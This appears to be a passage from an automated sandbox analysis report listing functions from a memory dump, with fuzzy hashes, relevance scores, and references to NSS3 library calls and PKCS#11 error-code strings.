Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: htonl
String ID: 0
API String ID: 2009864989-4108050209
Opcode ID: fd0c8228cd0bc96887e5ad457ad649c030497bde60a56ecf1d423c62bd65049b
Instruction ID: 48280591ce344bd0f6bdf13a06b35e4dba880f697a6cebe2eb9167913509694c
Opcode Fuzzy Hash: fd0c8228cd0bc96887e5ad457ad649c030497bde60a56ecf1d423c62bd65049b
Instruction Fuzzy Hash: BF510731E490798AEB15867D88603FEBBB29F82314F19433BC5B5A7AC1C224454B87A6

Function 6C79EE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C79F019
PK11_GenerateRandom.NSS3(?,00000000), ref: 6C79F0F9

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ErrorGenerateK11_Random
String ID:
API String ID: 3009229198-0
Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction ID: 695312eba94fb1bc17efd15af4b0791ba30f17ada78c92e8d72c98454beba451
Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction Fuzzy Hash: DC91B071E0061A8BCB14CF68D9906AEB7F1FF85324F24462DE926A7BC1D730A905CB90

Function 6C7C2F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6C7E7929), ref: 6C7C2FAC
PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6C7E7929), ref: 6C7C2FE0

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error
String ID:
API String ID: 2619118453-0
Opcode ID: c2d8f9844c5c9ded069efae989610508132f48daa2c21d78b5b2c8924c3f03e7
Instruction ID: 5d77cb985be534154fde0da4b42f05ee295af70386b9191af1de190d9e5d91c2
Opcode Fuzzy Hash: c2d8f9844c5c9ded069efae989610508132f48daa2c21d78b5b2c8924c3f03e7
Instruction Fuzzy Hash: 9E51D272B049178FD7108E59CA84BEA73B2FB45318F254179DD099BB02D735E986CB83

Function 6C70AC60 Relevance: 2.7, Strings: 2, Instructions: 181COMMON

Download Yara Rule

Strings

winUnlock, xrefs: 6C70AE18
winUnlockReadLock, xrefs: 6C70AE9F

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID: winUnlock$winUnlockReadLock
API String ID: 0-3432436631
Opcode ID: 8286ba93b060f0797e5aaa9709bebeb102b51a47fe6cff5740a2a40823797c96
Instruction ID: b6f307c2658bb00a5ad1fa335be71a3a84e4bc92077dec3ec05f55cf95ce56e3
Opcode Fuzzy Hash: 8286ba93b060f0797e5aaa9709bebeb102b51a47fe6cff5740a2a40823797c96
Instruction Fuzzy Hash: 89717F716042409BDB24CF28D895AABBBF5FF89318F14CA29F94997701D730A985CBC1

Function 6C7CED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C7CEE3D

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 9127789fb1516fa174b0858e974cf77ea96dade85fc2697538dc131452c94842
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: 6E71D372F0170A8FE718CF59CA8166AB7F2BF88304F15862DD85697B91D770E940CB92

Function 6C6F5F30 Relevance: 1.6, APIs: 1, Instructions: 350stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 6C6F6013

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: strcmp
String ID:
API String ID: 1004003707-0
Opcode ID: 51696dd6cbfe00ec9e1953678d33552eab44da2adaa6d9403b0730ceb5ea4b18
Instruction ID: 2632b975888e92dd721305618b05a59959764eb7a76559e59ec44c9eedd62a65
Opcode Fuzzy Hash: 51696dd6cbfe00ec9e1953678d33552eab44da2adaa6d9403b0730ceb5ea4b18
Instruction Fuzzy Hash: FEC1F570B056068BEB04CF59C4917AABBB3AF45318F248269D9B5D7B42D731EC43CB98

Function 6C704DB0 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C705125

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID: winUnlockReadLock
API String ID: 0-4244601998
Opcode ID: a137f98c5cbe8beeb1e42170f17fe615672b4328f76c41dbe1d064d65fc2389e
Instruction ID: 31419b0a65a6b9e9e4f61bd551f0552f04fe27ee1a3f85a521c56877684d9f57
Opcode Fuzzy Hash: a137f98c5cbe8beeb1e42170f17fe615672b4328f76c41dbe1d064d65fc2389e
Instruction Fuzzy Hash: AEE14DB0A183408FDB54DF28D585A5ABBF0FF89308F15862DF89997351E730A985CBC2

Function 6C885E60 Relevance: 1.4, APIs: 1, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 6C885B90: PR_Lock.NSS3(00010000,?,00000000,?,6C76DF9B), ref: 6C885B9E
Part of subcall function 6C885B90: PR_Unlock.NSS3 ref: 6C885BEA

memset.VCRUNTIME140(00000014,00000000,-000000D7,?,?,?,?,?,?,?,?,6C885E23,6C76E154), ref: 6C885EBF

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: LockUnlockmemset
String ID:
API String ID: 1725470033-0
Opcode ID: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
Instruction ID: 2eeffc90a1d34e91a6b7e803f3f239b7785cbf667326decdd9eebc47421b8770
Opcode Fuzzy Hash: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
Instruction Fuzzy Hash: 3351AD72E0121A8FDB18CF59C9819AEF3B2FF88314B19456DD816F7745D730A941CBA0

Function 6C83DCD0 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04a0d285d3f9e11ae25052fd983b22b6e3cd8f13ee7c807063c81eb2d9b1bbe6
Instruction ID: 959fbcb24f77d67cb3d9ab3dfb643a7a585b27b9f5f0742c747a4d719829abb5
Opcode Fuzzy Hash: 04a0d285d3f9e11ae25052fd983b22b6e3cd8f13ee7c807063c81eb2d9b1bbe6
Instruction Fuzzy Hash: DEF1AE71A01215CFDB18CF58C990BAA77B2BF89318F29A469D8099F741CB35ED42CBD1

Function 6C7D1DC0 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction ID: 81da1f1079f299e212e4a10e36ce68e6cff276ff7552b3ced6902acd1dce1d6b
Opcode Fuzzy Hash: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction Fuzzy Hash: 02D14872A056568BDB118E18C9843DA7B63AB85338F1F8368D8645B7C6C37BBD06C7D0

Function 6C768EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c235c778469c908188888b6195c34337e534f883589db312a2180aad853b8966
Instruction ID: 85772269306ed6f060212d7909bf1a2573831f66db85f77dbef2c698e1f87e9b
Opcode Fuzzy Hash: c235c778469c908188888b6195c34337e534f883589db312a2180aad853b8966
Instruction Fuzzy Hash: 1E119D32A002158BD714CF26D988B9AB3A9BF8231CF08427AD8158FE42C775E886C7C1

Function 6C840C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 005207e60937fb1fe5598cd68a2eef584fadeafff031d01e445dbadd68acbd89
Instruction ID: 387ae1043f323600d9da068388c65629caa9d269208999414f307bb6321cdd60
Opcode Fuzzy Hash: 005207e60937fb1fe5598cd68a2eef584fadeafff031d01e445dbadd68acbd89
Instruction Fuzzy Hash: 3911BC75604249CFCB20DF28C88066B77A2FF95368F14C879D8298B701DB71E806CBA1

Function 6C7B3FF0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$Error
String ID:
API String ID: 2275178025-0
Opcode ID: 37a8c3b9842fc2d9e5a5a66da0b4eaac7ef9756ba6ebcd5b89fee8b0d9ed7c7f
Instruction ID: ce1e1dd21cca560b932fa5fac9ed9c6a70df24558ce83cde2f2dc4d8c0d1cadb
Opcode Fuzzy Hash: 37a8c3b9842fc2d9e5a5a66da0b4eaac7ef9756ba6ebcd5b89fee8b0d9ed7c7f
Instruction Fuzzy Hash: 8CF05E70A047598BCB20DF6DC55159FB7F4EF09258F109629EC8AAB301EB30AAC4C7D1

Function 6C840D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 6812d79cce13ec76fe969c216d480c7c03adb4f4b1463c078b562b479e08346e
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: 80E06D3A202058A7DB248E49C550BAA7359DF9161AFA4C979CC599BA01D733F8078B81

Function 6C76CC60 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1780fd669f180d2d3ff48b230971e0e9ac02db7fbbfc2f500286e3bed2dedb2c
Instruction ID: 9ad117ff6351e41c3ec7abf1d939d8cc17f8e97802fb2e5db7c2c8b76a7430b9
Opcode Fuzzy Hash: 1780fd669f180d2d3ff48b230971e0e9ac02db7fbbfc2f500286e3bed2dedb2c
Instruction Fuzzy Hash: C2C04838244608CFC744DB08E489DA43BA8AB8961070440A4EA028B722DA21FC00CA80

Function 6C7A1D60 Relevance: 84.2, APIs: 1, Strings: 47, Instructions: 210COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6C7A1D46), ref: 6C7A2345

Strings

rv = 0x%x, xrefs: 6C7A2312
CKR_OPERATION_NOT_INITIALIZED, xrefs: 6C7A1FD7
CKR_TOKEN_RESOURCE_EXCEEDED, xrefs: 6C7A2293, 6C7A233F
CKR_PIN_LOCKED, xrefs: 6C7A2075
CKR_PIN_EXPIRED, xrefs: 6C7A206B
CKR_PIN_INVALID, xrefs: 6C7A2057
CKR_TOKEN_WRITE_PROTECTED, xrefs: 6C7A1DE0
CKR_TEMPLATE_INCOMPLETE, xrefs: 6C7A1F95
CKR_ENCRYPTED_DATA_LEN_RANGE, xrefs: 6C7A1F0F
CKR_NEW_PIN_MODE, xrefs: 6C7A1E9F
CKR_WRAPPED_KEY_LEN_RANGE, xrefs: 6C7A2319
CKR_RANDOM_SEED_NOT_SUPPORTED, xrefs: 6C7A22FF
CKR_FUNCTION_REJECTED, xrefs: 6C7A2289
CKR_WRAPPING_KEY_TYPE_INCONSISTENT, xrefs: 6C7A232E
CKR_DOMAIN_PARAMS_INVALID, xrefs: 6C7A2015
CKR_OK, xrefs: 6C7A1DFC
CKR_NEXT_OTP, xrefs: 6C7A222F
CKR_CURVE_NOT_SUPPORTED, xrefs: 6C7A2179
CKR_MUTEX_NOT_LOCKED, xrefs: 6C7A2225
CKR_TOKEN_NOT_RECOGNIZED, xrefs: 6C7A1F8B
CKR_INFORMATION_SENSITIVE, xrefs: 6C7A22B1
CKR_RANDOM_NO_RNG, xrefs: 6C7A22A7
CKR_OPERATION_CANCEL_FAILED, xrefs: 6C7A1F77
CKR_BUFFER_TOO_SMALL, xrefs: 6C7A2183
CKR_DEVICE_ERROR, xrefs: 6C7A229D
CKR_DEVICE_MEMORY, xrefs: 6C7A1FF3
CKR_SIGNATURE_INVALID, xrefs: 6C7A20CF
CKR_CRYPTOKI_NOT_INITIALIZED, xrefs: 6C7A2275
CKR_MUTEX_BAD, xrefs: 6C7A1F49
CKR_OPERATION_ACTIVE, xrefs: 6C7A22B8
rv = %s, xrefs: 6C7A2340
CKR_PIN_INCORRECT, xrefs: 6C7A1D92
CKR_DEVICE_REMOVED, xrefs: 6C7A2261
CKR_TEMPLATE_INCONSISTENT, xrefs: 6C7A1EE1
CKR_OBJECT_HANDLE_INVALID, xrefs: 6C7A204D
CKR_ENCRYPTED_DATA_INVALID, xrefs: 6C7A226B
CKR_STATE_UNSAVEABLE, xrefs: 6C7A2037
CKR_WRAPPING_KEY_HANDLE_INVALID, xrefs: 6C7A2320
CKR_WRAPPED_KEY_INVALID, xrefs: 6C7A1FB5
CKR_CRYPTOKI_ALREADY_INITIALIZED, xrefs: 6C7A227F
CKR_FUNCTION_NOT_PARALLEL, xrefs: 6C7A218D
CKR_PIN_LEN_RANGE, xrefs: 6C7A2061
CKR_SIGNATURE_LEN_RANGE, xrefs: 6C7A20D9
CKR_TOKEN_NOT_PRESENT, xrefs: 6C7A1F81
CKR_WRAPPING_KEY_SIZE_RANGE, xrefs: 6C7A2327
CKR_FUNCTION_CANCELED, xrefs: 6C7A1E73
CKR_SAVED_STATE_INVALID, xrefs: 6C7A1E56

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print
String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
API String ID: 3558298466-1980531169
Opcode ID: 86006713d2f34efcf6464d9bcf34b7ae27b6bc3979167df027d4a30ef55483ff
Instruction ID: 50258da6199335b6fbbbb9957f27e4d66b9a00dea3393a2c837b468e6418166f
Opcode Fuzzy Hash: 86006713d2f34efcf6464d9bcf34b7ae27b6bc3979167df027d4a30ef55483ff
Instruction Fuzzy Hash: 9161F02064E144D7E73C04CFC3AA36C31249B47305FA49BBBE689AEF91C675DA4B4693

Function 6C7D5DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6C7D5E08
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C7D5E3F
PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6C7D5E5C
free.MOZGLUE(00000000), ref: 6C7D5E7E
free.MOZGLUE(00000000), ref: 6C7D5E97
PORT_Strdup_Util.NSS3(secmod.db), ref: 6C7D5EA5
_NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6C7D5EBB
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C7D5ECB
PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6C7D5EF0
free.MOZGLUE(00000000), ref: 6C7D5F12
